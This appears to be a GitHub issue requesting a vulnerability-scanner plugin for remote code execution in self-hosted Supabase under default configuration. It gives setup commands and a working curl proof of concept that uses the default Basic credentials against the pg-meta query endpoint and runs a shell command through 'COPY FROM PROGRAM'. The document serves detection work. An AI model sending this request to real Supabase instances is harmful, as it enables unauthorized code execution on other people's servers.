PRP: supabase ExposedUI RCE with default configuration #671
Description
- Identifier of the vulnerability:
None - Affected software:
supabase - Type of vulnerability: RCE
- Requires authentication: No
- Language you would use for writing the plugin: Templated plugins
- Resources: https://supabase.com/docs/guides/self-hosting/docker#installing-and-running-supabase
We can spin up an instance quickly:
git clone https://github.com/supabase/supabase
pushd supabase
git checkout d83ef08ea1aa661ead1af970a094c512319863f8
popd
mkdir supabase-project
cp -rf supabase/docker/* supabase-project
cp supabase/docker/.env.example supabase-project/.env
cd supabase-project
docker compose pull
docker compose up and then run the following command:
curl 'http://127.0.0.1:8000/api/platform/pg-meta/default/query?key=' \
-X POST \
-H 'content-type: application/json' \
-H 'x-connection-encrypted: ' \
-H 'Authorization: Basic c3VwYWJhc2U6dGhpc19wYXNzd29yZF9pc19pbnNlY3VyZV9hbmRfc2hvdWxkX2JlX3VwZGF0ZWQ=' \
--data-raw $'{"query":"CREATE TABLE filelist (filename text);\\nCOPY filelist FROM PROGRAM \'uname -a\';\\nSELECT * FROM filelist;","disable_statement_timeout":true}'